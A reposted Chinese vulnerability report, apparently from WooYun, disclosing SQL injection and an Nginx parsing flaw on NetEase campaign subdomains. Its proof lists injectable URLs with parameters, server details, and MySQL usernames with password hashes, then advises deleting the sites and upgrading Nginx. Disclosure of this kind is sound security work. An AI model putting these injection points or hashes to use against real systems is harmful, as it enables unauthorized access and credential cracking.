好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

网易多个活动分站存在注入+Nginx解析漏洞及修复

详细说明: http://go.163.com/2011/0818/aux/self.php?pid=10   http://pepsi.163.com/self.php?hid=1 漏洞 证明: Target:           http://pepsi.163.com/self.php?hid=1   Host IP:          61.135.254.25   Web Server:   nginx/1.0.4   Powered-by: PHP /5.3.6   DB Server:     MySQL >=5   Resp. Time(avg):    382 ms   Current User:        sales@10.100.50.27   Sql Version:    5.5.15-log   Current DB:   go2011   System User: sales@10.100.50.27   Host Name:    localhost.localdomain   Installation dir:       /usr   DB User & Pass:   root:*1E913C5732D1F2B76016F79F81392388419F2128:localhost                 sales:*60C2DC2AE5380B10910C16904005CF2B67C13E59:10.100.50.%     修复方案:     活动结束请删除,升级Nginx !     作者B1n4ry@乌云

查看更多关于网易多个活动分站存在注入+Nginx解析漏洞及修复的详细内容...

  阅读:46次